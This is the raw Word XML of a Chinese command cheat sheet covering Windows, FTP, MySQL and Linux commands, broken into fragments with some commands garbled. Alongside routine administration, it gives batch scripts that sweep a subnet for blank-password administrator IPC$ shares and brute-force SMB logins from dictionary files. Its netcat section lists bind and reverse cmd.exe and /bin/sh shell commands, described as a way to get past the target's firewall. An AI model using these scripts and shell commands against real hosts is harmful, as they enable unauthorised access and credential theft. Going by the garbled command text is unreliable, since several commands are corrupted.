    <w:p w14:paraId="77F983D5" w14:textId="076A06A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format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盘符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/FS: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类型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格式化磁盘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类型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:FAT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FAT32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NTFS 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Format D: /FS:NTFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4380A2" w14:textId="15516EE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目录名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创建目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAAA33D" w14:textId="0B67521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replace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源文件　要替换文件的目录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替换文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F453394" w14:textId="45E2C2F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ren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原文件名　新文件名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重命名文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD87520" w14:textId="749E0B9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tree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以树形结构显示出目录，用参数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将列出第个文件夹中文件名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47124DF3" w14:textId="4AA82D8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type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显示文本文件的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244550E6" w14:textId="1F6274D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more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逐屏显示输出文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D576E" w14:textId="5E3A1A9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doskey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要锁定的命令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字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564FE290" w14:textId="0B2C504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doskey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要解锁命令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=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提供的锁定命令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编辑命令行，重新调用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命令，并创建宏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。如：锁定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doskey dir=entsky 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不能用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doskey dir=dir)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；解锁：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doskey dir=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B392B7" w14:textId="2CCB911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taskmgr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调出任务管理器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71105F9A" w14:textId="7B3EBD7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chkdsk /F D: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检查磁盘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并显示状态报告；加参数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并修复磁盘上的错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C309115" w14:textId="3332F0D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tlntadmn telnt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admn,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键入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tlntadmn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选择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，再选择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就可以更改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服务默认端口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为其它任何端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3A891B" w14:textId="0964512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exit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退出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程序或目前，用参数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/B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则是退出当前批处理脚本而不是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cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA864E" w14:textId="25F7078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path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路径可执行文件的文件名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为可执行文件设置一个路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EF52B4" w14:textId="731D9A0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cmd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命令解释窗口。参数：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/eff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/en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关闭、开启命令扩展；更我详细说明见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 /?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26447A51" w14:textId="0F61B26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regedit /s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注册表文件名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导入注册表；参数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指安静模式导入，无任何提示；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C152E5F" w14:textId="36D401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regedit /e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注册表文件名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导出注册表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A0CE26" w14:textId="0D596FD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cacls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　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显示或修改文件访问控制列表（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ACL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——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针对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NTFS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格式时。参数：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设定拒绝某用户访问；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:perm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替换指定用户的访问权限；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:perm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赋予指定用户访问权限；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Perm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可以是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: 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无，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读取，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W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写入，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C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更改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写入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完全控制；例：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cacls D: est.txt /D pub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d: est.txt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拒绝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pub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用户访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B116744" w14:textId="2E20CD6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cacls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查看文件的访问用户权限列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B35EEA" w14:textId="7C27271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REM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文本内容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在批处理文件中添加注解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4D0E3A" w14:textId="558BB99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netsh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查看或更改本地网络配置情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50278B08" w14:textId="22C10C7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IIS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服务命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D8215" w14:textId="2A070C7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iisreset /reboot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重启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计算机（但有提示系统将重启信息出现）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594420BE" w14:textId="38DBDEB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iisreset /start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stop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启动（停止）所有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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A8ECF2" w14:textId="032BC49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iisreset /restart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停止然后重新启动所有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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C96C42C" w14:textId="64B67E1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iisreset /status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显示所有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服务状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF0B809" w14:textId="0D2BD82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iisreset /enable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disable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在本地系统上启用（禁用）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服务的重新启动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D0E1E7" w14:textId="3D5DF14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iisreset /rebootonerror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当启动、停止或重新启动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服务时，若发生错误将重新开机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7709F9" w14:textId="4F7383B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iisreset /noforce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若无法停止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服务，将不会强制终止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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C671FF" w14:textId="06FE38D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iisreset /timeout Val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在到达逾时间（秒）时，仍未停止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服务，若指定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/rebootonerror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参数，则电脑将会重新开机。预设值为重新启动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秒，停止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秒，重新开机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秒。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17023361" w14:textId="77777777" w:rsidR="008C1716" w:rsidRDefault="008C1716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14:paraId="6C1003A0" w14:textId="48B65C5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FTP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后面有详细说明内容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3D67EF9C" w14:textId="3E475EC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的命令行格式为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</w:p>
    <w:p w14:paraId="57600F75" w14:textId="09DC394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ftp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显示远程服务器的所有响应信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3DE8E7" w14:textId="264DC03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使用调试方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311CA0E3" w14:textId="6D6A901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限制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的自动登录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即不使用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.netrc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文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3254FC6F" w14:textId="046DBB4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取消全局文件名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164EB3F" w14:textId="715875A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help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？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查看命令说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A176DA" w14:textId="6273247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bye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quit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终止主机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并退出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管理方式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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28594E0F" w14:textId="40E4D7F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pwd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列出当前远端主机目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051451A8" w14:textId="50A46F1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put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send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本地文件名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上传到主机上的文件名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将本地一个文件传送至远端主机中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778D5EB3" w14:textId="5935477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get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recv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远程主机文件名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]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下载到本地后的文件名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从远端主机中传送至本地主机中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0576F839" w14:textId="7E40D0A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mget [remote-files]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从远端主机接收一批文件至本地主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401D4FE4" w14:textId="6C58108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mput local-files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将本地主机中一批文件传送至远端主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8EA59C" w14:textId="3C7F6C5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dir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ls [remote-directory] [local-file]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列出当前远端主机目录中的文件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如果有本地文件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就将结果写至本地文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E742BF5" w14:textId="4C4D7C3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ascii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设定以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方式传送文件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缺省值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29C7517D" w14:textId="4F1C100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bin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image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设定以二进制方式传送文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8DE912" w14:textId="2B59BCD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bell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每完成一次文件传送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报警提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05334E61" w14:textId="225AB2D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cdup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返回上一级目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5295DD" w14:textId="3A33B0B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close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中断与远程服务器的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会话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open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对应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274C02B9" w14:textId="4901318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open host[port]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建立指定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服务器连接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可指定连接端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1138F8" w14:textId="0E3C481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delete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删除远端主机中的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C339B0" w14:textId="5F85DD1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mdelete [remote-files]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删除一批文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69890C99" w14:textId="4260C9E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mkdir directory-name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在远端主机中建立目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B52691" w14:textId="1856D55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rename [from] [to]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改变远端主机中的文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45957279" w14:textId="0DB729B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rmdir directory-name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删除远端主机中的目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11557815" w14:textId="204B64E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status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显示当前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的状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC753B" w14:textId="4C3C775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system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显示远端主机系统类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A035F" w14:textId="1175252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user user-name [password] [account]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重新以别的用户名登录远端主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00400A10" w14:textId="4591A0F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open host [port]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重新建立一个新的连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CEC448" w14:textId="50E4294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prompt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交互提示模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4CC80A" w14:textId="03419AD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macdef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定义宏命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A2ED3F" w14:textId="0F30223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lcd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改变当前本地主机的工作目录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如果缺省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就转到当前用户的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HOME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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F74338C" w14:textId="59236A4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chmod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改变远端主机的文件权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA5B66" w14:textId="1C5BF97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当为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命令拷贝的文件名到本地机器中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全部转换为小写字母</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C14B39" w14:textId="1585A44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cd remote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dir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进入远程主机目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266F8427" w14:textId="4FFD071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cdup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进入远程主机目录的父目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2D99B9" w14:textId="4AB4389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!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在本地机中执行交互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shell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exit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回到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环境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!ls*.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336F019C" w14:textId="3B855FB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#5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D2CC6B" w14:textId="77777777" w:rsidR="00AB4B59" w:rsidRDefault="00AB4B59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14:paraId="449D8860" w14:textId="212919E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MYSQL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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85A862" w14:textId="75877DD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 -h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主机地址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-u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如果刚安装好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，超级用户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root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是没有密码的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2499ABD1" w14:textId="5D2272A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（例：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 -h110.110.110.110 -Uroot -P123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36614033" w14:textId="636FA4F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:u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root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可以不用加空格，其它也一样）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE8C51C" w14:textId="6B35149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exit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退出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</w:p>
    <w:p w14:paraId="3BDEA22E" w14:textId="0086C7C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mysqladmin -u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-p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旧密码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password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新密码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修改密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6700A4D6" w14:textId="47FF316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grant select on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数据库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.* to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登录主机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identified by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";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增加新用户。（注意：和上面不同，下面的因为是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环境中的命令，所以后面都带一个分号作为命令结束符）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC095B0" w14:textId="2AB4890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show databases;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显示数据库列表。刚开始时才两个数据库：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test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库很重要它里面有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的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B42A6" w14:textId="693E592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use mysql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</w:p>
    <w:p w14:paraId="4578BF9C" w14:textId="78B3779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show tables;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显示库中的数据表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B8D54" w14:textId="60E8DF8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describe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显示数据表的结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07499833" w14:textId="49ACA55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create database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库名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建库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D609759" w14:textId="1F547FE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use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库名；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AFB5C" w14:textId="3F6141D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create table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字段设定列表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建表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA9E3F1" w14:textId="58E2ECD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drop database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库名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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A8791" w14:textId="26885C3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drop table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表名；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删库和删表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284F98A0" w14:textId="39636D5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delete from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将表中记录清空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109EE887" w14:textId="6A3E1CB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select * from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显示表中的记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4B3193" w14:textId="1AC29A2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mysqldump --opt school&gt;school.bbb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备份数据库：（命令在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DOS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mysqlin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目录下执行）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将数据库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school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备份到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school.bbb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school.bbb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是一个文本文件，文件名任取，打开看看你会有新发现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9A686" w14:textId="4CC9268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win2003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系统下新增命令（实用部份）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43363F84" w14:textId="5C84D24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shutdown /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关闭或重启本地或远程主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F86D1" w14:textId="68A14E3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参数说明：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关闭主机，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重启主机，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设定延时的时间，范围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～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秒之间，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/A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取消开机，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/M //IP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指定的远程主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2153CDEE" w14:textId="0C6F4CA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shutdown /r /t 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立即重启本地主机（无延时）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270FDA4F" w14:textId="2964D3E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taskill /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进程名或进程的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pid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终止一个或多个任务和进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2636E10B" w14:textId="65DA34F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参数说明：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/PID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要终止进程的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pid,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tasklist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命令获得各进程的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pid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/IM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要终止的进程的进程名，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强制终止进程，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终止指定的进程及他所启动的子进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22641C65" w14:textId="19A8C6A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tasklist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显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符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(PID)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75A20769" w14:textId="02E7C34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参数说明：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列出当前进程加载的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/SVC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显示出每个进程对应的服务，无参数时就只列出当前的进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6403343D" w14:textId="394B187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Linux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系统下基本命令　注：要区分大小写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F7F3FB" w14:textId="45BAA0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uname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显示版本信息（同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ver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</w:p>
    <w:p w14:paraId="6857CCA2" w14:textId="28EB577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dir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显示当前目录文件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,ls -al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显示包括隐藏文件（同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</w:p>
    <w:p w14:paraId="0B5244A3" w14:textId="684682C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pwd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查询当前所在的目录位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1FD643" w14:textId="2B1149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cd cd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..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回到上一层目录，注意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..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之间有空格。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返回到根目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566BB941" w14:textId="494B448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查看文件内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAEE89F" w14:textId="56557FC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cat &gt;abc.txt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abc.txt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文件中写上内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F1F30" w14:textId="6829135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more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以一页一页的方式显示一个文本文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FC3EFD" w14:textId="4417195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复制文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260965D9" w14:textId="18AF2D6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移动文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51950BED" w14:textId="6C253B9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rm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删除文件，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rm -a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目录名删除目录及子目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF7519F" w14:textId="5120720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mkdir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目录名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建立目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74032862" w14:textId="2E5811A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rmdir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删除子目录，目录内没有文档。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38313FD2" w14:textId="531C588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chmod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设定档案或目录的存取权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546A3DD2" w14:textId="42E3305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grep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在档案中查找字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD275A9" w14:textId="4245AB3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diff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档案文件比较</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F89C1A" w14:textId="0F6E490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find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档案搜寻</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8964C4" w14:textId="18E69EF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date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现在的日期、时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB8C72" w14:textId="1E76BA1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who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查询目前和你使用同一台机器的人以及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Login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时间地点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E77B1B4" w14:textId="46B1FC70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查询目前上机者的详细资料</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E91A62" w14:textId="61D6AB8D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whoami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查看自己的帐号名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A61331" w14:textId="03802335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groups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查看某人的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Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233B26BA" w14:textId="78254A18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passwd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更改密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4984F0" w14:textId="790CA8ED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history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查看自己下过的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327DBD16" w14:textId="6742FA95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ps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显示进程状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCBBCED" w14:textId="3D3F8E36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kill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停止某进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B91F6" w14:textId="039B1567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gcc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黑客通常用它来编译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语言写的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBB573E" w14:textId="1F0B81A0" w:rsidR="00137FA7" w:rsidRPr="00137FA7" w:rsidRDefault="00137FA7" w:rsidP="008C17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su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权限转换为指定使用者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010ECD4E" w14:textId="08EDEAA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 IP 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连接对方主机（同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），当出现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bash$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时就说明连接成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443F456E" w14:textId="535FD3E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 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连接上某服务器（同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win2K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）批处理命令与变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A575B86" w14:textId="1656311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命令及变量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基本格式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145EFBA6" w14:textId="3ACD7E7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FOR /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%variable IN (set) DO command [command_parameters] %variable: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指定一个单一字母可替换的参数，如：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%i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，而指定一个变量则用：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%%i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，而调用变量时用：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%i%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，变量是区分大小写的（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%i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不等于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%I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）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF7408" w14:textId="05C66A8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批处理每次能处理的变量从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%0—%9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共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个，其中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默认给批处理文件名使用，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默认为使用此批处理时输入的的第一个值，同理：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%2—%9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指输入的第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2-9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个值；例：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 ipipc$ pass /user:user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%1,pass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%2 ,user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%3(set):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指定一个或一组文件，可使用通配符，如：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(D:user.txt)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(1 1 254)(1 -1 254),{ “(1 1 254)”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第一个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"1"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指起始值，第二个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"1"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指增长量，第三个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"254"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指结束值，即：从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254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“(1 -1 254)”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说明：即从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254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 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50434221" w14:textId="6A1F071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command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：指定对第个文件执行的命令，如：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 use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命令；如要执行多个命令时，命令这间加：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&amp;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来隔开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4CC321" w14:textId="59DECB7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command_parameters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：为特定命令指定参数或命令行开关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE6AC57" w14:textId="6E02174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 (set)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：指在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(set)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中取值；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DO command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：指执行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command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E8043" w14:textId="2692552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指用增量形式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{ (set)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为增量形式时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}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/F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指从文件中不断取值，直到取完为止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{ (set)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为文件时，如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(d:pass.txt)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}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143B7185" w14:textId="5E859BC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用法举例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477EB370" w14:textId="3B0BD85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@echo off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B6AB66" w14:textId="3922A51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echo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用法格式：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test.bat *.*.* &gt; test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA4E7C" w14:textId="6181100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for /L %%G in (1 1 254) do echo %1.%%G &gt;&gt;test.txt &amp; net use \%1.%%G /user:administrator | find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命令成功完成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 &gt;&gt;test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1601AA24" w14:textId="739DC27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test.bat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说明：对指定的一个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类网段的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254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依次试建立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administrator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密码为空的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IPC$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连接，如果成功就把该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test.txt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中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E8D84E" w14:textId="7859049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指用增量形式（即从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1-254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254-1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）；输入的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前面三位：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*.*.*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为批处理默认的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%1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%%G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为变量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的最后一位）；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&amp;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用来隔开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echo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net use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这二个命令；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|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指建立了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ipc$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后，在结果中用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find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查看是否有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命令成功完成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信息；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%1.%%G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为完整的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(1 1 254)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指起始值，增长量，结止值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF0F22" w14:textId="3350721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@echo off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B493A5" w14:textId="3035863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echo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用法格式：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ok.bat ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65910A5D" w14:textId="5134274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FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08478182" w14:textId="4D2107B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存为：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ok.exe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说明：输入一个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后，用字典文件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d:pass.dic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来暴解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d:user.dic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中的用户密码，直到文件中值取完为止。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%%i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为用户名；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为输入的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地址（默认）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A400509" w14:textId="7CD03DB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七：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450DF593" w14:textId="15F4391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命令及变量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基本格式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4392D0EF" w14:textId="715F1BD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[not] errorlevel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如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为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真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72663411" w14:textId="6F880E6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errorlevel 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指程序执行后返回的值为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时，就值行后面的命令；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not errorlevel 1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命令指程序执行最后返回的值不等于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，就执行后面的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E868CF" w14:textId="3EF1D5F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指发现并成功执行（真）；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1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指没有发现、没执行（假）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5009B81F" w14:textId="613B8A2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[not]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1==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如果指定的文本字符串匹配（即：字符串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1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等于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），就执行后面的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE95ED2" w14:textId="6EE7010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“if "%2%"=="4" goto start”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指：如果输入的第二个变量为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时，执行后面的命令（注意：调用变量时就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变量名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%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 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</w:p>
    <w:p w14:paraId="56E764CC" w14:textId="418D394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[not] exist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如果指定的文件名存在，就执行后面的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0612BD08" w14:textId="362BA93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“if not nc.exe goto end”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指：如果没有发现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nc.exe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文件就跳到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":end"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标签处。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EA83FF" w14:textId="0798929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IF [not] errorlevel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else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IF [not]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1==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字符串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else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IF [not] exist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else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加上：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else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命令语句后指：当前面的条件不成立时，就指行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else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后面的命令。注意：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else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必须与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在同一行才有效。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当有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del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命令时需把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del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命令全部内容用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&lt; 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括起来，因为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del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命令要单独一行时才能执行，用上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&lt; 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后就等于是单独一行了；例如：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“if exist test.txt. &lt;del test.txt.&gt; else echo test.txt.missing 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，注意命令中的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“.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD687EF" w14:textId="438A948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系统外部命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33299B70" w14:textId="2CABA6A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注：系统外部命令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均需下载相关工具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5E3CF9B1" w14:textId="207810D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瑞士军刀：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nc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6443EB9E" w14:textId="1CB1C89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参数说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB2F0F4" w14:textId="44E4AAE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查看帮助信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D29157" w14:textId="693D049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后台模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E8223" w14:textId="0C18E6A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-e prog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程序重定向，一但连接就执行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危险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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21732FCA" w14:textId="041268F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-i secs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延时的间隔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD1F43" w14:textId="3291AFC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监听模式，用于入站连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA54719" w14:textId="310F277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监听模式，连接天闭后仍然继续监听，直到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CTR+C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA56A4A" w14:textId="706D0AC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-n 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地址，不能用域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEB7B6A" w14:textId="341AE7C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-o film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记录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进制的传输</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EA65E0" w14:textId="0F7CE0A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-p[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空格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本地端口号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19533073" w14:textId="199B902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-r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随机本地及远程端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277658D0" w14:textId="3845AF8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交互方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0239DD69" w14:textId="0A46692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-u UDP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模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EFC151" w14:textId="1010382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详细输出，用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-vv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将更详细</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7EE70" w14:textId="7FD9F7E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-w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timeout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延时间隔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2F707" w14:textId="4378599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-z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将输入，输出关掉（用于扫锚时）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442BA509" w14:textId="208BDFD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基本用法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59671FFC" w14:textId="3F4B75F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-nvv 192.168.0.1 80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192.168.0.1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</w:p>
    <w:p w14:paraId="6442FEF4" w14:textId="3A5FB21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-l -p 80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开启本机的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TCP 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端口并监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793BD2DE" w14:textId="0D73FB1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-nvv -w2 -z 192.168.0.1 80-1024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扫锚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192.168.0.1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80-1024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</w:p>
    <w:p w14:paraId="07159500" w14:textId="5455D46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nc -l -p 5354 -t -e c:winntsystem32cmd.exe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绑定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remote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cmdshell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remote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TCP 5354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</w:p>
    <w:p w14:paraId="6201C856" w14:textId="13DEC2A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-t -e c:winntsystem32cmd.exe 192.168.0.2 5354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梆定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remote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cmdshell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并反向连接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192.168.0.2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5354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</w:p>
    <w:p w14:paraId="403A9557" w14:textId="77777777" w:rsidR="00AB4B59" w:rsidRDefault="00AB4B59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14:paraId="796F72F1" w14:textId="3C08FF6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高级用法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43997060" w14:textId="24B2F58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-L -p 80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作为蜜罐用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：开启并不停地监听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端口，直到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CTR+C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为止</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7078F135" w14:textId="15EDDA8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-L -p 80 &gt; c:log.txt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作为蜜罐用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：开启并不停地监听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端口，直到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CTR+C,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同时把结果输出到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c:log.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACA7264" w14:textId="71CD130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-L -p 80 &lt; c:honeyport.txt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作为蜜罐用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3-1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：开启并不停地监听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端口，直到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CTR+C,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c:honeyport.txt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中内容送入管道中，亦可起到传送文件作用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73935525" w14:textId="65ABB29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type.exe c:honeyport | nc -L -p 80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作为蜜罐用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3-2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：开启并不停地监听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端口，直到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CTR+C,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c:honeyport.txt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中内容送入管道中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亦可起到传送文件作用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76365F27" w14:textId="32ACD40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本机上用：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-l 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本机端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED5EF8" w14:textId="09A88FA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在对方主机上用：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-e cmd.exe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 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*win2K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1361170E" w14:textId="315AE9F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-e /bin/sh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 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*linux,unix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反向连接突破对方主机的防火墙</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBE2817" w14:textId="192344D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本机上用：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-d -l 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&lt;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要传送的文件路径及名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014B015" w14:textId="12BCF4D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在对方主机上用：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nc -vv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本机端口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&gt;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存放文件的路径及名称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传送文件到对方主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B3D22C" w14:textId="510ADF5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注：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2192B2D6" w14:textId="493475E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|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管道命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E36ED9" w14:textId="7B06C1D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&lt;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&gt;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重定向命令。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“&lt;”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，例如：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tlntadmn &lt; test.txt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指把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test.txt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的内容赋值给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tlntadmn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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172029AA" w14:textId="5D5CBA5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@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表示执行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后面的命令，但不会显示出来（后台执行）；例：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@dir c:winnt &gt;&gt; d:log.txt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意思是：后台执行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，并把结果存在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d:log.txt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</w:t>
      </w:r>
    </w:p>
